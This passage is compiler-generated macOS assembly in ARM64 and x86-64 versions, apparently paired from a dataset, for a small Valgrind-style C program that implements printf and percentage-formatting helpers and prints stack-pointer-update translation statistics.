subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB7_18
b LBB7_10
LBB7_10:
ldur w9, [x29, #-32]
ldur w8, [x29, #-48]
add w8, w8, w9
stur w8, [x29, #-48]
stur wzr, [x29, #-52]
b LBB7_11
LBB7_11: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-52]
ldur w9, [x29, #-32]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_17
b LBB7_12
LBB7_12: ; in Loop: Header=BB7_11 Depth=1
ldur x8, [x29, #-16]
str x8, [sp, #24] ; 8-byte Folded Spill
ldurb w8, [x29, #-41]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_14
b LBB7_13
LBB7_13: ; in Loop: Header=BB7_11 Depth=1
ldur x8, [x29, #-40]
ldursw x9, [x29, #-52]
ldrsb w0, [x8, x9]
bl _local_toupper
sxtb w8, w0
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB7_15
LBB7_14: ; in Loop: Header=BB7_11 Depth=1
ldur x8, [x29, #-40]
ldursw x9, [x29, #-52]
ldrsb w8, [x8, x9]
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB7_15
LBB7_15: ; in Loop: Header=BB7_11 Depth=1
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur x1, [x29, #-24]
sxtb w0, w9
blr x8
b LBB7_16
LBB7_16: ; in Loop: Header=BB7_11 Depth=1
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB7_11
LBB7_17:
ldur w8, [x29, #-48]
stur w8, [x29, #-4]
b LBB7_38
LBB7_18:
ldur w8, [x29, #-32]
ldr w9, [sp, #52]
subs w8, w8, w9
str w8, [sp, #56]
ldur w8, [x29, #-28]
ands w8, w8, #0x4
cset w8, eq
tbnz w8, #0, LBB7_24
b LBB7_19
LBB7_19:
ldr w9, [sp, #56]
ldur w8, [x29, #-48]
add w8, w8, w9
stur w8, [x29, #-48]
stur wzr, [x29, #-52]
b LBB7_20
LBB7_20: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-52]
ldr w9, [sp, #56]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_23
b LBB7_21
LBB7_21: ; in Loop: Header=BB7_20 Depth=1
ldur x8, [x29, #-16]
ldur x1, [x29, #-24]
mov w0, #32
blr x8
b LBB7_22
LBB7_22: ; in Loop: Header=BB7_20 Depth=1
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB7_20
LBB7_23:
b LBB7_24
LBB7_24:
ldr w9, [sp, #52]
ldur w8, [x29, #-48]
add w8, w8, w9
stur w8, [x29, #-48]
stur wzr, [x29, #-52]
b LBB7_25
LBB7_25: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-52]
ldr w9, [sp, #52]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_31
b LBB7_26
LBB7_26: ; in Loop: Header=BB7_25 Depth=1
ldur x8, [x29, #-16]
str x8, [sp, #8] ; 8-byte Folded Spill
ldurb w8, [x29, #-41]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_28
b LBB7_27
LBB7_27: ; in Loop: Header=BB7_25 Depth=1
ldur x8, [x29, #-40]
ldursw x9, [x29, #-52]
ldrsb w0, [x8, x9]
bl _local_toupper
sxtb w8, w0
str w8, [sp, #4] ; 4-byte Folded Spill
b LBB7_29
LBB7_28: ; in Loop: Header=BB7_25 Depth=1
ldur x8, [x29, #-40]
ldursw x9, [x29, #-52]
ldrsb w8, [x8, x9]
str w8, [sp, #4] ; 4-byte Folded Spill
b LBB7_29
LBB7_29: ; in Loop: Header=BB7_25 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldur x1, [x29, #-24]
sxtb w0, w9
blr x8
b LBB7_30
LBB7_30: ; in Loop: Header=BB7_25 Depth=1
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB7_25
LBB7_31:
ldur w8, [x29, #-28]
ands w8, w8, #0x4
cset w8, ne
tbnz w8, #0, LBB7_37
b LBB7_32
LBB7_32:
ldr w9, [sp, #56]
ldur w8, [x29, #-48]
add w8, w8, w9
stur w8, [x29, #-48]
stur wzr, [x29, #-52]
b LBB7_33
LBB7_33: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-52]
ldr w9, [sp, #56]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_36
b LBB7_34
LBB7_34: ; in Loop: Header=BB7_33 Depth=1
ldur x8, [x29, #-16]
ldur x1, [x29, #-24]
mov w0, #32
blr x8
b LBB7_35
LBB7_35: ; in Loop: Header=BB7_33 Depth=1
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB7_33
LBB7_36:
b LBB7_37
LBB7_37:
ldur w8, [x29, #-48]
stur w8, [x29, #-4]
b LBB7_38
LBB7_38:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.globl _VG_vsprintf ; -- Begin function VG_vsprintf
.p2align 2
_VG_vsprintf: ; @VG_vsprintf
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
str x2, [sp, #24]
ldur x8, [x29, #-8]
add x1, sp, #8
str x1, [sp] ; 8-byte Folded Spill
str x8, [sp, #8]
ldur x2, [x29, #-16]
ldr x3, [sp, #24]
adrp x0, _add_to__sprintf_buf@PAGE
add x0, x0, _add_to__sprintf_buf@PAGEOFF
bl _VG_debugLog_vprintf
ldr x1, [sp] ; 8-byte Folded Reload
str w0, [sp, #20]
mov w0, #0
bl _add_to__sprintf_buf
ldur x0, [x29, #-8]
bl _local_strlen
ldr w8, [sp, #20]
subs w8, w0, w8
cset w9, ne
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB8_2
b LBB8_1
LBB8_1:
adrp x0, l___func__.VG_vsprintf@PAGE
add x0, x0, l___func__.VG_vsprintf@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
mov w2, #535
adrp x3, l_.str.2@PAGE
add x3, x3, l_.str.2@PAGEOFF
bl ___assert_rtn
LBB8_2:
b LBB8_3
LBB8_3:
ldr w0, [sp, #20]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function add_to__sprintf_buf
_add_to__sprintf_buf: ; @add_to__sprintf_buf
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
strb w0, [sp, #31]
str x1, [sp, #16]
ldr x8, [sp, #16]
str x8, [sp, #8]
ldrb w8, [sp, #31]
ldr x11, [sp, #8]
ldr x9, [x11]
add x10, x9, #1
str x10, [x11]
strb w8, [x9]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function local_strlen
_local_strlen: ; @local_strlen
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str wzr, [sp, #4]
b LBB10_1
LBB10_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB10_3
b LBB10_2
LBB10_2: ; in Loop: Header=BB10_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB10_1
LBB10_3:
ldr w0, [sp, #4]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _VG_sprintf ; -- Begin function VG_sprintf
.p2align 2
_VG_sprintf: ; @VG_sprintf
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
mov x9, sp
add x8, x29, #16
str x8, [x9]
ldur x0, [x29, #-8]
ldr x1, [sp, #16]
ldr x2, [sp]
bl _VG_vsprintf
str w0, [sp, #12]
ldr w0, [sp, #12]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _VG_percentify ; -- Begin function VG_percentify
.p2align 2
_VG_percentify: ; @VG_percentify
.cfi_startproc
; %bb.0:
sub sp, sp, #176
.cfi_def_cfa_offset 176
stp x29, x30, [sp, #160] ; 16-byte Folded Spill
add x29, sp, #160
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur x0, [x29, #-48]
stur x1, [x29, #-56]
stur w2, [x29, #-60]
stur w3, [x29, #-64]
stur x4, [x29, #-72]
ldur x8, [x29, #-56]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB12_2
b LBB12_1
LBB12_1:
ldur w9, [x29, #-64]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
sub x0, x29, #40
str x0, [sp, #40] ; 8-byte Folded Spill
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _VG_sprintf
ldr x1, [sp, #40] ; 8-byte Folded Reload
ldur x0, [x29, #-72]
mov x9, sp
adrp x8, l_.str.4@PAGE
add x8, x8, l_.str.4@PAGEOFF
str x8, [x9]
bl _VG_sprintf
b LBB12_22
LBB12_2:
ldur x9, [x29, #-48]
mov x8, #100
mul x8, x8, x9
ldur x9, [x29, #-56]
udiv x8, x8, x9
str x8, [sp, #64]
ldur w8, [x29, #-60]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB12_4
b LBB12_3
LBB12_3:
ldur x0, [x29, #-72]
ldr x8, [sp, #64]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _VG_sprintf
b LBB12_12
LBB12_4:
ldur w8, [x29, #-60]
str w8, [sp, #36] ; 4-byte Folded Spill
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB12_7
b LBB12_5
LBB12_5:
ldr w8, [sp, #36] ; 4-byte Folded Reload
subs w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB12_8
b LBB12_6
LBB12_6:
ldr w8, [sp, #36] ; 4-byte Folded Reload
subs w8, w8, #3
cset w8, eq
tbnz w8, #0, LBB12_9
b LBB12_10
LBB12_7:
mov w8, #10
str w8, [sp, #52]
b LBB12_11
LBB12_8:
mov w8, #100
str w8, [sp, #52]
b LBB12_11
LBB12_9:
mov w8, #1000
str w8, [sp, #52]
b LBB12_11
LBB12_10:
adrp x0, l___func__.VG_percentify@PAGE
add x0, x0, l___func__.VG_percentify@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
mov w2, #587
adrp x3, l_.str.6@PAGE
add x3, x3, l_.str.6@PAGEOFF
bl ___assert_rtn
LBB12_11:
ldur x9, [x29, #-48]
mov x8, #100
mul x8, x8, x9
ldr w9, [sp, #52]
; kill: def $x9 killed $w9
mul x8, x8, x9
ldur x9, [x29, #-56]
udiv x8, x8, x9
ldr w9, [sp, #52]
mov x10, x9
udiv x9, x8, x10
mul x9, x9, x10
subs x8, x8, x9
str x8, [sp, #56]
ldur w9, [x29, #-60]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
sub x0, x29, #40
str x0, [sp, #24] ; 8-byte Folded Spill
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _VG_sprintf
ldr x1, [sp, #24] ; 8-byte Folded Reload
ldur x0, [x29, #-72]
ldr x10, [sp, #64]
ldr x8, [sp, #56]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
bl _VG_sprintf
b LBB12_12
LBB12_12:
ldur x0, [x29, #-72]
bl _local_strlen
str w0, [sp, #80]
ldur w8, [x29, #-64]
ldr w9, [sp, #80]
subs w8, w8, w9
str w8, [sp, #76]
ldr w8, [sp, #76]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB12_14
b LBB12_13
LBB12_13:
str wzr, [sp, #76]
b LBB12_14
LBB12_14:
ldr w8, [sp, #80]
stur w8, [x29, #-76]
b LBB12_15
LBB12_15: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-76]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB12_18
b LBB12_16
LBB12_16: ; in Loop: Header=BB12_15 Depth=1
ldur x8, [x29, #-72]
ldursw x9, [x29, #-76]
add x8, x8, x9
ldrb w8, [x8]
ldur x9, [x29, #-72]
ldur w10, [x29, #-76]
ldr w11, [sp, #76]
add w10, w10, w11
add x9, x9, w10, sxtw
strb w8, [x9]
b LBB12_17
LBB12_17: ; in Loop: Header=BB12_15 Depth=1
ldur w8, [x29, #-76]
subs w8, w8, #1
stur w8, [x29, #-76]
b LBB12_15
LBB12_18:
stur wzr, [x29, #-76]
b LBB12_19
LBB12_19: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-76]
ldr w9, [sp, #76]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB12_22
b LBB12_20
LBB12_20: ; in Loop: Header=BB12_19 Depth=1
ldur x8, [x29, #-72]
ldursw x9, [x29, #-76]
add x9, x8, x9
mov w8, #32
strb w8, [x9]
b LBB12_21
LBB12_21: ; in Loop: Header=BB12_19 Depth=1
ldur w8, [x29, #-76]
add w8, w8, #1
stur w8, [x29, #-76]
b LBB12_19
LBB12_22:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB12_24
b LBB12_23
LBB12_23:
bl ___stack_chk_fail
LBB12_24:
ldp x29, x30, [sp, #160] ; 16-byte Folded Reload
add sp, sp, #176
ret
.cfi_endproc
; -- End function
.globl _VG_print_translation_stats ; -- Begin function VG_print_translation_stats
.p2align 2
_VG_print_translation_stats: ; @VG_print_translation_stats
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _n_SP_updates_fast@PAGE
str x8, [sp, #24] ; 8-byte Folded Spill
ldr w9, [x8, _n_SP_updates_fast@PAGEOFF]
adrp x10, _n_SP_updates_generic_known@PAGE
str x10, [sp, #32] ; 8-byte Folded Spill
ldr w10, [x10, _n_SP_updates_generic_known@PAGEOFF]
add w9, w9, w10
adrp x10, _n_SP_updates_generic_unknown@PAGE
stur x10, [x29, #-32] ; 8-byte Folded Spill
ldr w10, [x10, _n_SP_updates_generic_unknown@PAGEOFF]
add w9, w9, w10
stur w9, [x29, #-12]
ldr w8, [x8, _n_SP_updates_fast@PAGEOFF]
mov x0, x8
ldur w8, [x29, #-12]
mov x1, x8
mov w2, #1
str w2, [sp, #40] ; 4-byte Folded Spill
mov w3, #6
stur w3, [x29, #-36] ; 4-byte Folded Spill
sub x4, x29, #6
stur x4, [x29, #-24] ; 8-byte Folded Spill
bl _VG_percentify
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-24] ; 8-byte Folded Reload
ldr w9, [x9, _n_SP_updates_fast@PAGEOFF]
; implicit-def: $x10
mov x10, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _VG_printf
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr w2, [sp, #40] ; 4-byte Folded Reload
ldur w3, [x29, #-36] ; 4-byte Folded Reload
ldur x4, [x29, #-24] ; 8-byte Folded Reload
ldr w8, [x8, _n_SP_updates_generic_known@PAGEOFF]
mov x0, x8
ldur w8, [x29, #-12]
mov x1, x8
bl _VG_percentify
ldr x9, [sp, #32] ; 8-byte Folded Reload
ldur x8, [x29, #-24] ; 8-byte Folded Reload
ldr w9, [x9, _n_SP_updates_generic_known@PAGEOFF]
; implicit-def: $x10
mov x10, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _VG_printf
ldr w2, [sp, #40] ; 4-byte Folded Reload
ldur w3, [x29, #-36] ; 4-byte Folded Reload
ldur x8, [x29, #-32] ; 8-byte Folded Reload
ldur x4, [x29, #-24] ; 8-byte Folded Reload
ldr w8, [x8, _n_SP_updates_generic_unknown@PAGEOFF]
mov x0, x8
ldur w8, [x29, #-12]
mov x1, x8
bl _VG_percentify
ldur x9, [x29, #-32] ; 8-byte Folded Reload
ldur x8, [x29, #-24] ; 8-byte Folded Reload
ldr w9, [x9, _n_SP_updates_generic_unknown@PAGEOFF]
; implicit-def: $x10
mov x10, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _VG_printf
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #8] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
bl _VG_print_translation_stats
ldr w0, [sp, #8] ; 4-byte Folded Reload
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function vprintf_to_buf
_vprintf_to_buf: ; @vprintf_to_buf
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str x2, [sp, #8]
str wzr, [sp, #4]
ldur x8, [x29, #-8]
ldr x8, [x8, #520]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB15_2
b LBB15_1
LBB15_1:
ldur x8, [x29, #-8]
ldr x8, [x8, #520]
ldr w8, [x8]
adds w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB15_3
b LBB15_2
LBB15_2:
ldur x1, [x29, #-8]
ldr x2, [sp, #16]
ldr x3, [sp, #8]
adrp x0, _add_to__printf_buf@PAGE
add x0, x0, _add_to__printf_buf@PAGEOFF
bl _VG_debugLog_vprintf
str w0, [sp, #4]
b LBB15_3
LBB15_3:
ldr w0, [sp, #4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function send_bytes_to_logging_sink
_send_bytes_to_logging_sink: ; @send_bytes_to_logging_sink
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str w2, [sp, #12]
ldr x0, [sp, #16]
ldrsw x2, [sp, #12]
adrp x8, ___stdoutp@GOTPAGE
ldr x8, [x8, ___stdoutp@GOTPAGEOFF]
str x8, [sp] ; 8-byte Folded Spill
ldr x3, [x8]
mov x1, #1
bl _fwrite
ldr x8, [sp] ; 8-byte Folded Reload
ldr x0, [x8]
bl _fflush
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function add_to__printf_buf
_add_to__printf_buf: ; @add_to__printf_buf
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturb w0, [x29, #-1]
str x1, [sp, #16]
ldr x8, [sp, #16]
str x8, [sp, #8]
ldr x8, [sp, #8]
ldrsw x8, [x8, #512]
subs x8, x8, #510
cset w8, ls
tbnz w8, #0, LBB17_2
b LBB17_1
LBB17_1:
ldr x8, [sp, #8]
ldr x0, [x8, #520]
ldr x1, [sp, #8]
ldr x8, [sp, #8]
ldr w2, [x8, #512]
bl _send_bytes_to_logging_sink
ldr x8, [sp, #8]
str wzr, [x8, #512]
b LBB17_2
LBB17_2:
ldurb w8, [x29, #-1]
ldr x9, [sp, #8]
ldr x12, [sp, #8]
ldrsw x10, [x12, #512]
mov x11, x10
add w11, w11, #1
str w11, [x12, #512]
add x9, x9, x10
strb w8, [x9]
ldr x8, [sp, #8]
ldr x9, [sp, #8]
ldrsw x9, [x9, #512]
add x8, x8, x9
strb wzr, [x8]
ldr x8, [sp, #8]
ldrsw x8, [x8, #512]
subs x8, x8, #512
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB17_4
b LBB17_3
LBB17_3:
adrp x0, l___func__.add_to__printf_buf@PAGE
add x0, x0, l___func__.add_to__printf_buf@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
mov w2, #80
adrp x3, l_.str.12@PAGE
add x3, x3, l_.str.12@PAGEOFF
bl ___assert_rtn
LBB17_4:
b LBB17_5
LBB17_5:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function local_toupper
_local_toupper: ; @local_toupper
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
strb w0, [sp, #14]
ldrsb w8, [sp, #14]
subs w8, w8, #97
cset w8, lt
tbnz w8, #0, LBB18_3
b LBB18_1
LBB18_1:
ldrsb w8, [sp, #14]
subs w8, w8, #122
cset w8, gt
tbnz w8, #0, LBB18_3
b LBB18_2
LBB18_2:
ldrsb w8, [sp, #14]
subs w8, w8, #32
strb w8, [sp, #15]
b LBB18_4
LBB18_3:
ldrb w8, [sp, #14]
strb w8, [sp, #15]
b LBB18_4
LBB18_4:
ldrsb w0, [sp, #15]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _VG_log_output_sink ; @VG_log_output_sink
.p2align 2
_VG_log_output_sink:
.long 2 ; 0x2
.byte 0 ; 0x0
.space 3
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "(null)"
l___func__.VG_vsprintf: ; @__func__.VG_vsprintf
.asciz "VG_vsprintf"
l_.str.1: ; @.str.1
.asciz "84370.c"
l_.str.2: ; @.str.2
.asciz "local_strlen(buf) == ret"
l_.str.3: ; @.str.3
.asciz "%%-%ds"
l_.str.4: ; @.str.4
.asciz "--%"
l_.str.5: ; @.str.5
.asciz "%lld%%"
l___func__.VG_percentify: ; @__func__.VG_percentify
.asciz "VG_percentify"
l_.str.6: ; @.str.6
.asciz "0"
l_.str.7: ; @.str.7
.asciz "%%lld.%%0%dlld%%%%"
.zerofill __DATA,__bss,_n_SP_updates_fast,4,2 ; @n_SP_updates_fast
.zerofill __DATA,__bss,_n_SP_updates_generic_known,4,2 ; @n_SP_updates_generic_known
.zerofill __DATA,__bss,_n_SP_updates_generic_unknown,4,2 ; @n_SP_updates_generic_unknown
l_.str.8: ; @.str.8
.asciz "translate: fast SP updates identified: %'u (%s)\n"
l_.str.9: ; @.str.9
.asciz "translate: generic_known SP updates identified: %'u (%s)\n"
l_.str.10: ; @.str.10
.asciz "translate: generic_unknown SP updates identified: %'u (%s)\n"
.section __TEXT,__const
l_.str.11: ; @.str.11
.space 512
.section __TEXT,__cstring,cstring_literals
l___func__.add_to__printf_buf: ; @__func__.add_to__printf_buf
.asciz "add_to__printf_buf"
l_.str.12: ; @.str.12
.asciz "b->buf_used < sizeof(b->buf)"
l_.str.13: ; @.str.13
.asciz "0123456789ABCDEF"
l_.str.14: ; @.str.14
.asciz "0123456789abcdef"
l_.str.15: ; @.str.15
.asciz "&"
l_.str.16: ; @.str.16
.asciz "<"
l_.str.17: ; @.str.17
.asciz ">"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _VG_vprintf ## -- Begin function VG_vprintf
.p2align 4, 0x90
_VG_vprintf: ## @VG_vprintf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rsi
movq -16(%rbp), %rdx
leaq _VG_log_output_sink(%rip), %rdi
callq _vprintf_WRK
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function vprintf_WRK
_vprintf_WRK: ## @vprintf_WRK
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $576, %rsp ## imm = 0x240
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -544(%rbp)
movq %rsi, -552(%rbp)
movq %rdx, -560(%rbp)
leaq -536(%rbp), %rdi
leaq l_.str.11(%rip), %rsi
movl $512, %edx ## imm = 0x200
callq _memcpy
movl $0, -24(%rbp)
movq -544(%rbp), %rax
movq %rax, -16(%rbp)
movq -552(%rbp), %rsi
movq -560(%rbp), %rdx
leaq -536(%rbp), %rdi
callq _vprintf_to_buf
movl %eax, -564(%rbp)
cmpl $0, -24(%rbp)
jle LBB1_2
## %bb.1:
movq -16(%rbp), %rdi
leaq -536(%rbp), %rsi
movl -24(%rbp), %edx
callq _send_bytes_to_logging_sink
LBB1_2:
movl -564(%rbp), %eax
movl %eax, -568(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB1_4
## %bb.3:
movl -568(%rbp), %eax ## 4-byte Reload
addq $576, %rsp ## imm = 0x240
popq %rbp
retq
LBB1_4:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _VG_printf ## -- Begin function VG_printf
.p2align 4, 0x90
_VG_printf: ## @VG_printf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
testb %al, %al
je LBB2_4
## %bb.3:
movaps %xmm0, -176(%rbp)
movaps %xmm1, -160(%rbp)
movaps %xmm2, -144(%rbp)
movaps %xmm3, -128(%rbp)
movaps %xmm4, -112(%rbp)
movaps %xmm5, -96(%rbp)
movaps %xmm6, -80(%rbp)
movaps %xmm7, -64(%rbp)
LBB2_4:
movq %r9, -184(%rbp)
movq %r8, -192(%rbp)
movq %rcx, -200(%rbp)
movq %rdx, -208(%rbp)
movq %rsi, -216(%rbp)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -40(%rbp)
leaq -32(%rbp), %rax
leaq -224(%rbp), %rcx
movq %rcx, 16(%rax)
leaq 16(%rbp), %rcx
movq %rcx, 8(%rax)
movl $48, 4(%rax)
movl $8, (%rax)
movq -40(%rbp), %rdi
leaq -32(%rbp), %rsi
callq _VG_vprintf
movl %eax, -44(%rbp)
leaq -32(%rbp), %rax
movl -44(%rbp), %eax
movl %eax, -228(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB2_2
## %bb.1:
movl -228(%rbp), %eax ## 4-byte Reload
addq $240, %rsp
popq %rbp
retq
LBB2_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _VG_debugLog_vprintf ## -- Begin function VG_debugLog_vprintf
.p2align 4, 0x90
_VG_debugLog_vprintf: ## @VG_debugLog_vprintf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $640, %rsp ## imm = 0x280
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq %rcx, -32(%rbp)
movl $0, -36(%rbp)
movl $0, -52(%rbp)
movl $0, -40(%rbp)
LBB3_1: ## =>This Loop Header: Depth=1
## Child Loop BB3_9 Depth 2
## Child Loop BB3_18 Depth 2
## Child Loop BB3_23 Depth 2
movq -24(%rbp), %rax
